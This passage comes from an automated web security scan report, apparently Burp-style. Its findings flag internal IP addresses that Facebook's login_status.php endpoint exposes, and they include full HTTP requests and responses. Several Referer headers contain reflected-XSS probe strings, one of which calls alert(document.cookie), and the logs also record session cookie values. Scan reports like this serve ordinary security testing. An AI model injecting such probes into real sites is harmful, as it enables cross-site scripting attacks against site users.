X-FB-Server: 10.32.199.113
X-Cnection: close
Date: Mon, 13 Jun 2011 11:20:37 GMT
Content-Length: 243

<script type="text/javascript">
parent.postMessage("cb=f257f79508&origin=http\u00253A\u00252F\u00252Fwww.expedia.com\u00252Ff359f099c4&relation=parent&transport=postmessage&frame=f38aac6758", "http:\/
...[SNIP]...

22.57. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.205.47

Request

Response

22.58. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.91.33

Request

GET /extern/login_status.php?api_key=129912307028545&app_id=129912307028545&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df20ae550b4%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e253f468%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33242d928%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdbdb343c%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33242d928&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1792c3a08%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33242d928&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ef1319bc%26origin%3Dhttp%253A%252F%252Fwww.mavgear.com%252Ff23692f8a8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df33242d928&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mavgear.com/Dallas-Mavericks-2011-NBA-Champions-Locker-Room-Tee.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.91.33
X-Cnection: close
Date: Mon, 13 Jun 2011 11:12:02 GMT
Content-Length: 243

<script type="text/javascript">
parent.postMessage("cb=f1792c3a08&origin=http\u00253A\u00252F\u00252Fwww.mavgear.com\u00252Ff23692f8a8&relation=parent&transport=postmessage&frame=f33242d928", "http:\/
...[SNIP]...

22.59. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.183.184

Request

GET /extern/login_status.php?api_key=249141081161&app_id=249141081161&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d86edb28%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff3dedbc0e4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe72baf8%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff3dedbc0e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfabf00088%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3b462f774%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff3dedbc0e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfabf00088&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df35c5cef18%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff3dedbc0e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfabf00088&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b8b713d8%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff3dedbc0e4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfabf00088&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/fanposts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.183.184
X-Cnection: close
Date: Mon, 13 Jun 2011 11:20:44 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

22.60. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.75.44

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.75.44
X-Cnection: close
Date: Mon, 13 Jun 2011 11:08:01 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

22.61. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.60.61

Request

GET /extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
Cookie: datr=_9znTYtA3lbYE3P4Asd4RYkJ

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.60.61
X-Cnection: close
Date: Mon, 13 Jun 2011 11:33:53 GMT
Content-Length: 1283

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"idolator.com","channel":"ht
...[SNIP]...

22.62. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.73.48

Request

GET /extern/login_status.php?api_key=125384590834102&app_id=125384590834102&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df206402c24%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Ff30ffa6f68%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e37f580c%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Ff30ffa6f68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df174fa2fc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df233f7059%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Ff30ffa6f68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df174fa2fc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16178a7a%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Ff30ffa6f68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df174fa2fc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b859bb5%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Ff30ffa6f68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df174fa2fc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.73.48
X-Cnection: close
Date: Mon, 13 Jun 2011 11:06:56 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f16178a7a&origin=http\u00253A\u00252F\u00252Fthesouthern.com\u00252Ff30ffa6f68&relation=parent&transport=postmessage&frame=f174fa2fc", "http:\/\/
...[SNIP]...

22.63. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.42.61

Request

GET /extern/login_status.php?api_key=249141081161&app_id=249141081161&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22039d488%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff2713b4a2c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32be43258%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff2713b4a2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7a1d9694%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3362e04e4%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff2713b4a2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7a1d9694&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23cef87c%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff2713b4a2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7a1d9694&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18c953fdc%26origin%3Dhttp%253A%252F%252Fwww.mavsmoneyball.com%252Ff2713b4a2c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7a1d9694&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/mavericks-tickets
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.42.61
X-Cnection: close
Date: Mon, 13 Jun 2011 11:14:11 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

22.64. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.51.50

Request

GET /extern/login_status.php?api_key=125384590834102&app_id=125384590834102&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df337dc9528%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Ffb8e569dc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df306b916b%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Ffb8e569dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1aa41a72c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33c8df09%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Ffb8e569dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1aa41a72c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df385dc8c8c%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Ffb8e569dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1aa41a72c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37a9c9f8%26origin%3Dhttp%253A%252F%252Fthesouthern.com%252Ffb8e569dc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1aa41a72c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.51.50
X-Cnection: close
Date: Mon, 13 Jun 2011 11:13:05 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f385dc8c8c&origin=http\u00253A\u00252F\u00252Fthesouthern.com\u00252Ffb8e569dc&relation=parent&transport=postmessage&frame=f1aa41a72c", "http:\/\
...[SNIP]...

22.65. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.229.34

Request

GET /extern/login_status.php?api_key=141597515880090&app_id=141597515880090&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df184ff83%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff28ba604ec%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df238a34a4%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff28ba604ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc5172f8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37c6be818%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff28ba604ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc5172f8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8d9a0084%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff28ba604ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc5172f8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18ac3e4dc%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff28ba604ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfc5172f8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.229.34
X-Cnection: close
Date: Mon, 13 Jun 2011 11:21:54 GMT
Content-Length: 240

<script type="text/javascript">
parent.postMessage("cb=f8d9a0084&origin=http\u00253A\u00252F\u00252Fwww.expedia.com\u00252Ff28ba604ec&relation=parent&transport=postmessage&frame=fc5172f8", "http:\/\/w
...[SNIP]...

22.66. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.85.59

Request

GET /extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=0&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.85.59
X-Cnection: close
Date: Mon, 13 Jun 2011 11:32:47 GMT
Content-Length: 1283

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"idolator.com","channel":"ht
...[SNIP]...

22.67. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.63.73

Request

GET /extern/login_status.php?api_key=f631bf498a8c497fc05cc294f7d2cdca&extern=2&channel=http%3A%2F%2Fidolator.com%2Fwp-content%2Fplugins%2Fwp-facebookconnect%2Fxd_receiver.php&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(1)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.63.73
X-Cnection: close
Date: Mon, 13 Jun 2011 11:33:35 GMT
Content-Length: 1262

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"idolator.com","channel":"ht
...[SNIP]...

22.68. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.46.33

Request

GET /extern/login_status.php?api_key=119370714775514&app_id=119370714775514&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a05b33cc%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffc67ed3f4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdcf0faec%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffc67ed3f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df394f504%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b027f218%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffc67ed3f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df394f504&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29f144f98%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffc67ed3f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df394f504&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3626a3c%26origin%3Dhttp%253A%252F%252Fwww.tvfanatic.com%252Ffc67ed3f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df394f504&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Wd6UP

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.46.33
X-Cnection: close
Date: Mon, 13 Jun 2011 11:26:29 GMT
Content-Length: 243

<script type="text/javascript">
parent.postMessage("cb=f29f144f98&origin=http\u00253A\u00252F\u00252Fwww.tvfanatic.com\u00252Ffc67ed3f4&relation=parent&transport=postmessage&frame=f394f504", "http:\/\
...[SNIP]...

22.69. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.248.117

Request

GET /extern/login_status.php?api_key=198078866886655&app_id=198078866886655&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11c6b5bbc%26origin%3Dhttp%253A%252F%252Ftunedin.blogs.time.com%252Ff1d847ebd%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a65e7ad8%26origin%3Dhttp%253A%252F%252Ftunedin.blogs.time.com%252Ff1d847ebd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df422bb964%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2acd112c4%26origin%3Dhttp%253A%252F%252Ftunedin.blogs.time.com%252Ff1d847ebd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df422bb964&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df206a18218%26origin%3Dhttp%253A%252F%252Ftunedin.blogs.time.com%252Ff1d847ebd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df422bb964&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39ef3fb4%26o